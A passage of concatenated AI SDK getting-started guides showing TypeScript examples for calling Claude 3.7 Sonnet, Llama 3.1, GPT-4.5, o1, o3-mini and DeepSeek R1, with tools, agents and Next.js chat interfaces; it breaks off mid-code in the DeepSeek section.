AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.

With four main hooks — useChat, useCompletion, and useObject — you can incorporate real-time chat capabilities, text completions, streamed JSON, and interactive assistant features into your app.

Let's explore building a chatbot with Next.js, the AI SDK, and Claude 3.7 Sonnet:

In a new Next.js application, first install the AI SDK and the Anthropic provider:

Then, create a route handler for the chat endpoint:

import { anthropic, AnthropicProviderOptions } from '@ai-sdk/anthropic';
import { streamText, UIMessage, convertToModelMessages } from 'ai';

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: anthropic('claude-3-7-sonnet-20250219'),
    messages: convertToModelMessages(messages),
    providerOptions: {
      anthropic: {
        thinking: { type: 'enabled', budgetTokens: 12000 },
      } satisfies AnthropicProviderOptions,
    },
  });

  return result.toUIMessageStreamResponse({
    sendReasoning: true,
  });
}

Finally, update the root page (app/page.tsx) to use the useChat hook:

'use client';

import { useChat } from '@ai-sdk/react';

export default function Page() {
  const { messages, input, handleInputChange, handleSubmit, error } = useChat();

  return (
    <>
      {messages.map(message => (
        <div key={message.id}>
          {message.role === 'user' ? 'User: ' : 'AI: '}
          {message.parts.map((part, index) => {
            // text parts:
            if (part.type === 'text') {
              return <div key={index}>{part.text}</div>;
            }
            // reasoning parts:
            if (part.type === 'reasoning') {
              return (
                <pre key={index}>
                  {part.details.map(detail =>
                    detail.type === 'text' ? detail.text : '<redacted>',
                  )}
                </pre>
              );
            }
          })}
        </div>
      ))}
      <form onSubmit={handleSubmit}>
        <input name="prompt" value={input} onChange={handleInputChange} />
        <button type="submit">Submit</button>
      </form>
    </>
  );
}

Get Started

Ready to dive in? Here's how you can begin:

Explore the documentation at ai-sdk.dev/docs to understand the capabilities of the AI SDK.
Check out practical examples at ai-sdk.dev/examples to see the SDK in action.
Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) at ai-sdk.dev/docs/guides.
Use ready-to-deploy AI templates at vercel.com/templates?type=ai.

Claude 3.7 Sonnet opens new opportunities for reasoning-intensive AI applications. Start building today and leverage the power of advanced reasoning in your AI projects.

title: Get started with Llama 3.1 description: Get started with Llama 3.1 using the AI SDK. tags: ['getting-started']

Get started with Llama 3.1

With the release of Llama 3.1, there has never been a better time to start building AI applications.

The AI SDK is a powerful TypeScript toolkit for building AI application with large language models (LLMs) like Llama 3.1 alongside popular frameworks like React, Next.js, Vue, Svelte, Node.js, and more

Llama 3.1

The release of Meta's Llama 3.1 is an important moment in AI development. As the first state-of-the-art open weight AI model, Llama 3.1 is helping accelerate developers building AI apps. Available in 8B, 70B, and 405B sizes, these instruction-tuned models work well for tasks like dialogue generation, translation, reasoning, and code generation.

Benchmarks

Llama 3.1 surpasses most available open-source chat models on common industry benchmarks and even outperforms some closed-source models, offering superior performance in language nuances, contextual understanding, and complex multi-step tasks. The models' refined post-training processes significantly improve response alignment, reduce false refusal rates, and enhance answer diversity, making Llama 3.1 a powerful and accessible tool for building generative AI applications.

Llama 3.1 Benchmarks Source: Meta AI - Llama 3.1 Model Card

Choosing Model Size

Llama 3.1 includes a new 405B parameter model, becoming the largest open-source model available today. This model is designed to handle the most complex and demanding tasks.

When choosing between the different sizes of Llama 3.1 models (405B, 70B, 8B), consider the trade-off between performance and computational requirements. The 405B model offers the highest accuracy and capability for complex tasks but requires significant computational resources. The 70B model provides a good balance of performance and efficiency for most applications, while the 8B model is suitable for simpler tasks or resource-constrained environments where speed and lower computational overhead are priorities.

Getting Started with the AI SDK

The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.

At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call Llama 3.1 (using DeepInfra) with the AI SDK:

import { deepinfra } from '@ai-sdk/deepinfra';
import { generateText } from 'ai';

const { text } = await generateText({
  model: deepinfra('meta-llama/Meta-Llama-3.1-405B-Instruct'),
  prompt: 'What is love?',
});

AI SDK Core abstracts away the differences between model providers, allowing you to focus on building great applications. Prefer to use Amazon Bedrock? The unified interface also means that you can easily switch between models by changing just two lines of code.

import { generateText } from 'ai';
import { bedrock } from '@ai-sdk/amazon-bedrock';

const { text } = await generateText({
  model: bedrock('meta.llama3-1-405b-instruct-v1'),
  prompt: 'What is love?',
});

Streaming the Response

To stream the model's response as it's being generated, update your code snippet to use the streamText function.

import { streamText } from 'ai';
import { deepinfra } from '@ai-sdk/deepinfra';

const { textStream } = streamText({
  model: deepinfra('meta-llama/Meta-Llama-3.1-405B-Instruct'),
  prompt: 'What is love?',
});

Generating Structured Data

import { generateObject } from 'ai';
import { deepinfra } from '@ai-sdk/deepinfra';
import { z } from 'zod';

const { object } = await generateObject({
  model: deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct'),
  schema: z.object({
    recipe: z.object({
      name: z.string(),
      ingredients: z.array(z.object({ name: z.string(), amount: z.string() })),
      steps: z.array(z.string()),
    }),
  }),
  prompt: 'Generate a lasagna recipe.',
});

This code snippet will generate a type-safe recipe that conforms to the specified zod schema.

Tools

While LLMs have incredible generation capabilities, they struggle with discrete tasks (e.g. mathematics) and interacting with the outside world (e.g. getting the weather). The solution: tools, which are like programs that you provide to the model, which it can choose to call as necessary.

Using Tools with the AI SDK

The AI SDK supports tool usage across several of its functions, including generateText and streamUI. By passing one or more tools to the tools parameter, you can extend the capabilities of LLMs, allowing them to perform discrete tasks and interact with external systems.

Here's an example of how you can use a tool with the AI SDK and Llama 3.1:

import { generateText, tool } from 'ai';
import { deepinfra } from '@ai-sdk/deepinfra';
import { z } from 'zod';

const { text } = await generateText({
  model: deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct'),
  prompt: 'What is the weather like today?',
  tools: {
    getWeather: tool({
      description: 'Get the weather in a location',
      parameters: z.object({
        location: z.string().describe('The location to get the weather for'),
      }),
      execute: async ({ location }) => ({
        location,
        temperature: 72 + Math.floor(Math.random() * 21) - 10,
      }),
    }),
  },
});

In this example, the getWeather tool allows the model to fetch real-time weather data, enhancing its ability to provide accurate and up-to-date information.

Agents

Agents take your AI applications a step further by allowing models to execute multiple steps (i.e. tools) in a non-deterministic way, making decisions based on context and user input.

Agents use LLMs to choose the next step in a problem-solving process. They can reason at each step and make decisions based on the evolving context.

Implementing Agents with the AI SDK

The AI SDK supports agent implementation through the maxSteps parameter. This allows the model to make multiple decisions and tool calls in a single interaction.

Here's an example of an agent that solves math problems:

import { generateText, tool } from 'ai';
import { deepinfra } from '@ai-sdk/deepinfra';
import * as mathjs from 'mathjs';
import { z } from 'zod';

const problem =
  'Calculate the profit for a day if revenue is $5000 and expenses are $3500.';

const { text: answer } = await generateText({
  model: deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct'),
  system:
    'You are solving math problems. Reason step by step. Use the calculator when necessary.',
  prompt: problem,
  tools: {
    calculate: tool({
      description: 'A tool for evaluating mathematical expressions.',
      parameters: z.object({ expression: z.string() }),
      execute: async ({ expression }) => mathjs.evaluate(expression),
    }),
  },
  maxSteps: 5,
});

In this example, the agent can use the calculator tool multiple times if needed, reasoning through the problem step by step.

Building Interactive Interfaces

AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.

Let's explore building a chatbot with Next.js, the AI SDK, and Llama 3.1 (via DeepInfra):

import { deepinfra } from '@ai-sdk/deepinfra';
import { convertToModelMessages, streamText } from 'ai';

// Allow streaming responses up to 30 seconds
export const maxDuration = 30;

export async function POST(req: Request) {
  const { messages } = await req.json();

  const result = streamText({
    model: deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct'),
    messages: convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse();
}

'use client';

import { useChat } from '@ai-sdk/react';

export default function Page() {
  const { messages, input, handleInputChange, handleSubmit } = useChat();

  return (
    <>
      {messages.map(message => (
        <div key={message.id}>
          {message.role === 'user' ? 'User: ' : 'AI: '}
          {message.content}
        </div>
      ))}
      <form onSubmit={handleSubmit}>
        <input name="prompt" value={input} onChange={handleInputChange} />
        <button type="submit">Submit</button>
      </form>
    </>
  );
}

This enables a seamless chat experience where the user can see the AI response as soon as it is available, without having to wait for the entire response to be received.

Going Beyond Text

The AI SDK's React Server Components (RSC) API enables you to create rich, interactive interfaces that go beyond simple text generation. With the streamUI function, you can dynamically stream React components from the server to the client.

Let's dive into how you can leverage tools with AI SDK RSC to build a generative user interface with Next.js (App Router).

First, create a Server Action.

'use server';

import { streamUI } from '@ai-sdk/rsc';
import { deepinfra } from '@ai-sdk/deepinfra';
import { z } from 'zod';

export async function streamComponent() {
  const result = await streamUI({
    model: deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct'),
    prompt: 'Get the weather for San Francisco',
    text: ({ content }) => <div>{content}</div>,
    tools: {
      getWeather: {
        description: 'Get the weather for a location',
        parameters: z.object({ location: z.string() }),
        generate: async function* ({ location }) {
          yield <div>loading...</div>;
          const weather = '25c'; // await getWeather(location);
          return (
            <div>
              the weather in {location} is {weather}.
            </div>
          );
        },
      },
    },
  });
  return result.value;
}

In this example, if the model decides to use the getWeather tool, it will first yield a div while fetching the weather data, then return a weather component with the fetched data (note: static data in this example). This allows for a more dynamic and responsive UI that can adapt based on the AI's decisions and external data.

On the frontend, you can call this Server Action like any other asynchronous function in your application. In this case, the function returns a regular React component.

'use client';

import { useState } from 'react';
import { streamComponent } from './actions';

export default function Page() {
  const [component, setComponent] = useState<React.ReactNode>();

  return (
    <div>
      <form
        onSubmit={async e => {
          e.preventDefault();
          setComponent(await streamComponent());
        }}
      >
        <button>Stream Component</button>
      </form>
      <div>{component}</div>
    </div>
  );
}

To see AI SDK RSC in action, check out our open-source Next.js Gemini Chatbot.

Migrate from OpenAI

One of the key advantages of the AI SDK is its unified API, which makes it incredibly easy to switch between different AI models and providers. This flexibility is particularly useful when you want to migrate from one model to another, such as moving from OpenAI's GPT models to Meta's Llama models hosted on DeepInfra.

Here's how simple the migration process can be:

OpenAI Example:

import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';

const { text } = await generateText({
  model: openai('gpt-4.1'),
  prompt: 'What is love?',
});

Llama on DeepInfra Example:

import { generateText } from 'ai';
import { deepinfra } from '@ai-sdk/deepinfra';

const { text } = await generateText({
  model: deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct'),
  prompt: 'What is love?',
});

Thanks to the unified API, the core structure of the code remains the same. The main differences are:

Creating a DeepInfra client
Changing the model name from openai("gpt-4.1") to deepinfra("meta-llama/Meta-Llama-3.1-70B-Instruct").

With just these few changes, you've migrated from using OpenAI's GPT-4-Turbo to Meta's Llama 3.1 hosted on DeepInfra. The generateText function and its usage remain identical, showcasing the power of the AI SDK's unified API.

This feature allows you to easily experiment with different models, compare their performance, and choose the best one for your specific use case without having to rewrite large portions of your codebase.

Prompt Engineering and Fine-tuning

While the Llama 3.1 family of models are powerful out-of-the-box, their performance can be enhanced through effective prompt engineering and fine-tuning techniques.

Prompt Engineering

Prompt engineering is the practice of crafting input prompts to elicit desired outputs from language models. It involves structuring and phrasing prompts in ways that guide the model towards producing more accurate, relevant, and coherent responses.

For more information on prompt engineering techniques (specific to Llama models), check out these resources:

Fine-tuning

Fine-tuning involves further training a pre-trained model on a specific dataset or task to customize its performance for particular use cases. This process allows you to adapt Llama 3.1 to your specific domain or application, potentially improving its accuracy and relevance for your needs.

To learn more about fine-tuning Llama models, check out these resources:

Conclusion

The AI SDK offers a powerful and flexible way to integrate cutting-edge AI models like Llama 3.1 into your applications. With AI SDK Core, you can seamlessly switch between different AI models and providers by changing just two lines of code. This flexibility allows for quick experimentation and adaptation, reducing the time required to change models from days to minutes.

The AI SDK ensures that your application remains clean and modular, accelerating development and future-proofing against the rapidly evolving landscape.

Ready to get started? Here's how you can dive in:

Explore the documentation at ai-sdk.dev/docs to understand the full capabilities of the AI SDK.
Check out practical examples at ai-sdk.dev/examples to see the SDK in action and get inspired for your own projects.
Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) and multi-modal chat at ai-sdk.dev/docs/guides.
Check out ready-to-deploy AI templates at vercel.com/templates?type=ai.

title: Get started with GPT-4.5 description: Get started with GPT-4.5 using the AI SDK. tags: ['getting-started']

Get started with OpenAI GPT-4.5

With the release of OpenAI's GPT-4.5 model, there has never been a better time to start building AI applications, particularly those that require a deeper understanding of the world.

The AI SDK is a powerful TypeScript toolkit for building AI applications with large language models (LLMs) like OpenAI GPT-4.5 alongside popular frameworks like React, Next.js, Vue, Svelte, Node.js, and more.

OpenAI GPT-4.5

OpenAI recently released GPT-4.5, their largest and best model for chat yet. GPT‑4.5 is a step forward in scaling up pretraining and post-training. By scaling unsupervised learning, GPT‑4.5 improves its ability to recognize patterns, draw connections, and generate creative insights without reasoning.

Based on early testing, developers may find GPT‑4.5 particularly useful for applications that benefit from its higher emotional intelligence and creativity such as writing help, communication, learning, coaching, and brainstorming. It also shows strong capabilities in agentic planning and execution, including multi-step coding workflows and complex task automation.

Benchmarks

GPT-4.5 demonstrates impressive performance across various benchmarks:

SimpleQA Accuracy: 62.5% (higher is better)
SimpleQA Hallucination Rate: 37.1% (lower is better)

Source

Prompt Engineering for GPT-4.5

GPT-4.5 performs best with the following approach:

Be clear and specific: GPT-4.5 responds well to direct, well-structured prompts.
Use delimiters for clarity: Use delimiters like triple quotation marks, XML tags, or section titles to clearly indicate distinct parts of the input.

Getting Started with the AI SDK

The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.

At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call OpenAI GPT-4.5 with the AI SDK:

import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';

const { text } = await generateText({
  model: openai('gpt-4.5-preview'),
  prompt: 'Explain the concept of quantum entanglement.',
});

Generating Structured Data

import { generateObject } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';

const { object } = await generateObject({
  model: openai('gpt-4.5-preview'),
  schema: z.object({
    recipe: z.object({
      name: z.string(),
      ingredients: z.array(z.object({ name: z.string(), amount: z.string() })),
      steps: z.array(z.string()),
    }),
  }),
  prompt: 'Generate a lasagna recipe.',
});

This code snippet will generate a type-safe recipe that conforms to the specified zod schema.

Using Tools with the AI SDK

GPT-4.5 supports tool calling out of the box, allowing it to interact with external systems and perform discrete tasks. Here's an example of using tool calling with the AI SDK:

import { generateText, tool } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';

const { text } = await generateText({
  model: openai('gpt-4.5-preview'),
  prompt: 'What is the weather like today in San Francisco?',
  tools: {
    getWeather: tool({
      description: 'Get the weather in a location',
      parameters: z.object({
        location: z.string().describe('The location to get the weather for'),
      }),
      execute: async ({ location }) => ({
        location,
        temperature: 72 + Math.floor(Math.random() * 21) - 10,
      }),
    }),
  },
});

In this example, the getWeather tool allows the model to fetch real-time weather data (simulated for simplicity), enhancing its ability to provide accurate and up-to-date information.

Building Interactive Interfaces

AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.

Let's explore building a chatbot with Next.js, the AI SDK, and OpenAI GPT-4.5:

In a new Next.js application, first install the AI SDK and the OpenAI provider:

Then, create a route handler for the chat endpoint:

import { openai } from '@ai-sdk/openai';
import { convertToModelMessages, streamText, UIMessage } from 'ai';

// Allow responses up to 30 seconds
export const maxDuration = 30;

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: openai('gpt-4.5-preview'),
    messages: convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse();
}

Finally, update the root page (app/page.tsx) to use the useChat hook:

'use client';

import { useChat } from '@ai-sdk/react';

export default function Page() {
  const { messages, input, handleInputChange, handleSubmit, error } = useChat();

  return (
    <>
      {messages.map(message => (
        <div key={message.id}>
          {message.role === 'user' ? 'User: ' : 'AI: '}
          {message.content}
        </div>
      ))}
      <form onSubmit={handleSubmit}>
        <input name="prompt" value={input} onChange={handleInputChange} />
        <button type="submit">Submit</button>
      </form>
    </>
  );
}

Get Started

Ready to get started? Here's how you can dive in:

Explore the documentation at ai-sdk.dev/docs to understand the full capabilities of the AI SDK.
Check out practical examples at ai-sdk.dev/examples to see the SDK in action and get inspired for your own projects.
Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) and multi-modal chat at ai-sdk.dev/docs/guides.
Check out ready-to-deploy AI templates at vercel.com/templates?type=ai.

title: Get started with OpenAI o1 description: Get started with OpenAI o1 using the AI SDK. tags: ['getting-started', 'reasoning']

Get started with OpenAI o1

With the release of OpenAI's o1 series models, there has never been a better time to start building AI applications, particularly those that require complex reasoning capabilities.

The AI SDK is a powerful TypeScript toolkit for building AI applications with large language models (LLMs) like OpenAI o1 alongside popular frameworks like React, Next.js, Vue, Svelte, Node.js, and more.

OpenAI o1

OpenAI released a series of AI models designed to spend more time thinking before responding. They can reason through complex tasks and solve harder problems than previous models in science, coding, and math. These models, named the o1 series, are trained with reinforcement learning and can "think before they answer". As a result, they are able to produce a long internal chain of thought before responding to a prompt.

There are three reasoning models available in the API:

o1: Designed to reason about hard problems using broad general knowledge about the world.
o1-preview: The original preview version of o1 - slower than o1 but supports streaming.
o1-mini: A faster and cheaper version of o1, particularly adept at coding, math, and science tasks where extensive general knowledge isn't required. o1-mini supports streaming.

Model	Streaming	Tools	Object Generation	Reasoning Effort
o1
o1-preview
o1-mini

Benchmarks

OpenAI o1 models excel in scientific reasoning, with impressive performance across various domains:

Ranking in the 89th percentile on competitive programming questions (Codeforces)
Placing among the top 500 students in the US in a qualifier for the USA Math Olympiad (AIME)
Exceeding human PhD-level accuracy on a benchmark of physics, biology, and chemistry problems (GPQA)

Source

Prompt Engineering for o1 Models

The o1 models perform best with straightforward prompts. Some prompt engineering techniques, like few-shot prompting or instructing the model to "think step by step," may not enhance performance and can sometimes hinder it. Here are some best practices:

Keep prompts simple and direct: The models excel at understanding and responding to brief, clear instructions without the need for extensive guidance.
Avoid chain-of-thought prompts: Since these models perform reasoning internally, prompting them to "think step by step" or "explain your reasoning" is unnecessary.
Use delimiters for clarity: Use delimiters like triple quotation marks, XML tags, or section titles to clearly indicate distinct parts of the input, helping the model interpret different sections appropriately.
Limit additional context in retrieval-augmented generation (RAG): When providing additional context or documents, include only the most relevant information to prevent the model from overcomplicating its response.

Getting Started with the AI SDK

The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.

At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call OpenAI o1-mini with the AI SDK:

import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';

const { text } = await generateText({
  model: openai('o1-mini'),
  prompt: 'Explain the concept of quantum entanglement.',
});

AI SDK Core abstracts away the differences between model providers, allowing you to focus on building great applications. The unified interface also means that you can easily switch between models by changing just one line of code.

import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';

const { text } = await generateText({
  model: openai('o1'),
  prompt: 'Explain the concept of quantum entanglement.',
});

Refining Reasoning Effort

You can control the amount of reasoning effort expended by o1 through the reasoningEffort parameter. This parameter can be set to 'low', 'medium', or 'high' to adjust how much time and computation the model spends on internal reasoning before producing a response.

import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';

// Reduce reasoning effort for faster responses
const { text } = await generateText({
  model: openai('o1'),
  prompt: 'Explain quantum entanglement briefly.',
  providerOptions: {
    openai: { reasoningEffort: 'low' },
  },
});

Generating Structured Data

import { generateObject } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';

const { object } = await generateObject({
  model: openai('o1'),
  schema: z.object({
    recipe: z.object({
      name: z.string(),
      ingredients: z.array(z.object({ name: z.string(), amount: z.string() })),
      steps: z.array(z.string()),
    }),
  }),
  prompt: 'Generate a lasagna recipe.',
});

This code snippet will generate a type-safe recipe that conforms to the specified zod schema.

Tools

Using Tools with the AI SDK

The AI SDK supports tool usage across several of its functions, like generateText and streamText. By passing one or more tools to the tools parameter, you can extend the capabilities of LLMs, allowing them to perform discrete tasks and interact with external systems.

Here's an example of how you can use a tool with the AI SDK and o1:

import { generateText, tool } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';

const { text } = await generateText({
  model: openai('o1'),
  prompt: 'What is the weather like today?',
  tools: {
    getWeather: tool({
      description: 'Get the weather in a location',
      parameters: z.object({
        location: z.string().describe('The location to get the weather for'),
      }),
      execute: async ({ location }) => ({
        location,
        temperature: 72 + Math.floor(Math.random() * 21) - 10,
      }),
    }),
  },
});

In this example, the getWeather tool allows the model to fetch real-time weather data (simulated for simplicity), enhancing its ability to provide accurate and up-to-date information.

Tools are only compatible with o1, not o1-preview or o1-mini.

Building Interactive Interfaces

AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.

Let's explore building a chatbot with Next.js, the AI SDK, and OpenAI o1:

import { openai } from '@ai-sdk/openai';
import { convertToModelMessages, streamText, UIMessage } from 'ai';

// Allow responses up to 5 minutes
export const maxDuration = 300;

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: openai('o1-mini'),
    messages: convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse();
}

'use client';

import { useChat } from '@ai-sdk/react';

export default function Page() {
  const { messages, input, handleInputChange, handleSubmit, error } = useChat();

  return (
    <>
      {messages.map(message => (
        <div key={message.id}>
          {message.role === 'user' ? 'User: ' : 'AI: '}
          {message.content}
        </div>
      ))}
      <form onSubmit={handleSubmit}>
        <input name="prompt" value={input} onChange={handleInputChange} />
        <button type="submit">Submit</button>
      </form>
    </>
  );
}

Get Started

Ready to get started? Here's how you can dive in:

Explore the documentation at ai-sdk.dev/docs to understand the full capabilities of the AI SDK.
Check out our support for the o1 series of reasoning models in the OpenAI Provider.
Check out practical examples at ai-sdk.dev/examples to see the SDK in action and get inspired for your own projects.
Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) and multi-modal chat at ai-sdk.dev/docs/guides.
Check out ready-to-deploy AI templates at vercel.com/templates?type=ai.

title: Get started with OpenAI o3-mini description: Get started with OpenAI o3-mini using the AI SDK. tags: ['getting-started', 'reasoning']

Get started with OpenAI o3-mini

With the release of OpenAI's o3-mini model, there has never been a better time to start building AI applications, particularly those that require complex STEM reasoning capabilities.

The AI SDK is a powerful TypeScript toolkit for building AI applications with large language models (LLMs) like OpenAI o3-mini alongside popular frameworks like React, Next.js, Vue, Svelte, Node.js, and more.

OpenAI o3-mini

OpenAI recently released a new AI model optimized for STEM reasoning that excels in science, math, and coding tasks. o3-mini matches o1's performance in these domains while delivering faster responses and lower costs. The model supports tool calling, structured outputs, and system messages, making it a great option for a wide range of applications.

o3-mini offers three reasoning effort levels:

[Low]: Optimized for speed while maintaining solid reasoning capabilities
[Medium]: Balanced approach matching o1's performance levels
[High]: Enhanced reasoning power exceeding o1 in many STEM domains

Model	Streaming	Tool Calling	Structured Output	Reasoning Effort	Image Input
o3-mini

Benchmarks

OpenAI o3-mini demonstrates impressive performance across technical domains:

87.3% accuracy on AIME competition math questions
79.7% accuracy on PhD-level science questions (GPQA Diamond)
2130 Elo rating on competitive programming (Codeforces)
49.3% accuracy on verified software engineering tasks (SWE-bench)

These benchmark results are using high reasoning effort setting.

Source

Prompt Engineering for o3-mini

The o3-mini model performs best with straightforward prompts. Some prompt engineering techniques, like few-shot prompting or instructing the model to "think step by step," may not enhance performance and can sometimes hinder it. Here are some best practices:

Keep prompts simple and direct: The model excels at understanding and responding to brief, clear instructions without the need for extensive guidance.
Avoid chain-of-thought prompts: Since the model performs reasoning internally, prompting it to "think step by step" or "explain your reasoning" is unnecessary.
Use delimiters for clarity: Use delimiters like triple quotation marks, XML tags, or section titles to clearly indicate distinct parts of the input.

Getting Started with the AI SDK

The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.

At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call OpenAI o3-mini with the AI SDK:

import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';

const { text } = await generateText({
  model: openai('o3-mini'),
  prompt: 'Explain the concept of quantum entanglement.',
});

Refining Reasoning Effort

You can control the amount of reasoning effort expended by o3-mini through the reasoningEffort parameter. This parameter can be set to low, medium, or high to adjust how much time and computation the model spends on internal reasoning before producing a response.

import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';

// Reduce reasoning effort for faster responses
const { text } = await generateText({
  model: openai('o3-mini'),
  prompt: 'Explain quantum entanglement briefly.',
  providerOptions: {
    openai: { reasoningEffort: 'low' },
  },
});

Generating Structured Data

import { generateObject } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';

const { object } = await generateObject({
  model: openai('o3-mini'),
  schema: z.object({
    recipe: z.object({
      name: z.string(),
      ingredients: z.array(z.object({ name: z.string(), amount: z.string() })),
      steps: z.array(z.string()),
    }),
  }),
  prompt: 'Generate a lasagna recipe.',
});

This code snippet will generate a type-safe recipe that conforms to the specified zod schema.

Using Tools with the AI SDK

o3-mini supports tool calling out of the box, allowing it to interact with external systems and perform discrete tasks. Here's an example of using tool calling with the AI SDK:

import { generateText, tool } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';

const { text } = await generateText({
  model: openai('o3-mini'),
  prompt: 'What is the weather like today in San Francisco?',
  tools: {
    getWeather: tool({
      description: 'Get the weather in a location',
      parameters: z.object({
        location: z.string().describe('The location to get the weather for'),
      }),
      execute: async ({ location }) => ({
        location,
        temperature: 72 + Math.floor(Math.random() * 21) - 10,
      }),
    }),
  },
});

In this example, the getWeather tool allows the model to fetch real-time weather data (simulated for simplicity), enhancing its ability to provide accurate and up-to-date information.

Building Interactive Interfaces

AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.

Let's explore building a chatbot with Next.js, the AI SDK, and OpenAI o3-mini:

In a new Next.js application, first install the AI SDK and the DeepSeek provider:

Then, create a route handler for the chat endpoint:

import { openai } from '@ai-sdk/openai';
import { convertToModelMessages, streamText, UIMessage } from 'ai';

// Allow responses up to 5 minutes
export const maxDuration = 300;

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: openai('o3-mini'),
    messages: convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse();
}

Finally, update the root page (app/page.tsx) to use the useChat hook:

'use client';

import { useChat } from '@ai-sdk/react';

export default function Page() {
  const { messages, input, handleInputChange, handleSubmit, error } = useChat();

  return (
    <>
      {messages.map(message => (
        <div key={message.id}>
          {message.role === 'user' ? 'User: ' : 'AI: '}
          {message.content}
        </div>
      ))}
      <form onSubmit={handleSubmit}>
        <input name="prompt" value={input} onChange={handleInputChange} />
        <button type="submit">Submit</button>
      </form>
    </>
  );
}

Get Started

Ready to get started? Here's how you can dive in:

Explore the documentation at ai-sdk.dev/docs to understand the full capabilities of the AI SDK.
Check out our support for o3-mini in the OpenAI Provider.
Check out practical examples at ai-sdk.dev/examples to see the SDK in action and get inspired for your own projects.
Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) and multi-modal chat at ai-sdk.dev/docs/guides.
Check out ready-to-deploy AI templates at vercel.com/templates?type=ai.

title: Get started with DeepSeek R1 description: Get started with DeepSeek R1 using the AI SDK. tags: ['getting-started', 'reasoning']

Get started with DeepSeek R1

With the release of DeepSeek R1, there has never been a better time to start building AI applications, particularly those that require complex reasoning capabilities.

The AI SDK is a powerful TypeScript toolkit for building AI applications with large language models (LLMs) like DeepSeek R1 alongside popular frameworks like React, Next.js, Vue, Svelte, Node.js, and more.

DeepSeek R1

DeepSeek R1 is a series of advanced AI models designed to tackle complex reasoning tasks in science, coding, and mathematics. These models are optimized to "think before they answer," producing detailed internal chains of thought that aid in solving challenging problems.

The series includes two primary variants:

DeepSeek R1-Zero: Trained exclusively with reinforcement learning (RL) without any supervised fine-tuning. It exhibits advanced reasoning capabilities but may struggle with readability and formatting.
DeepSeek R1: Combines reinforcement learning with cold-start data and supervised fine-tuning to improve both reasoning performance and the readability of outputs.

Benchmarks

DeepSeek R1 models excel in reasoning tasks, delivering competitive performance across key benchmarks:

AIME 2024 (Pass@1): 79.8%
MATH-500 (Pass@1): 97.3%
Codeforces (Percentile): Top 4% (96.3%)
GPQA Diamond (Pass@1): 71.5%

Source

Prompt Engineering for DeepSeek R1 Models

DeepSeek R1 models excel with structured and straightforward prompts. The following best practices can help achieve optimal performance:

Use a structured format: Leverage the model’s preferred output structure with <think> tags for reasoning and <answer> tags for the final result.
Prefer zero-shot prompts: Avoid few-shot prompting as it can degrade performance; instead, directly state the problem clearly.
Specify output expectations: Guide the model by defining desired formats, such as markdown for readability or XML-like tags for clarity.

Getting Started with the AI SDK

The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.

At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call DeepSeek R1 with the AI SDK:

import { deepseek } from '@ai-sdk/deepseek';
import { generateText } from 'ai';

const { reasoning, text } = await generateText({
  model: deepseek('deepseek-reasoner'),
  prompt: 'Explain quantum entanglement.',
});

The unified interface also means that you can easily switch between providers by changing just two lines of code. For example, to use DeepSeek R1 via Fireworks:

import { fireworks } from '@ai-sdk/fireworks';
import {
  generateText,
  wrapLanguageModel,
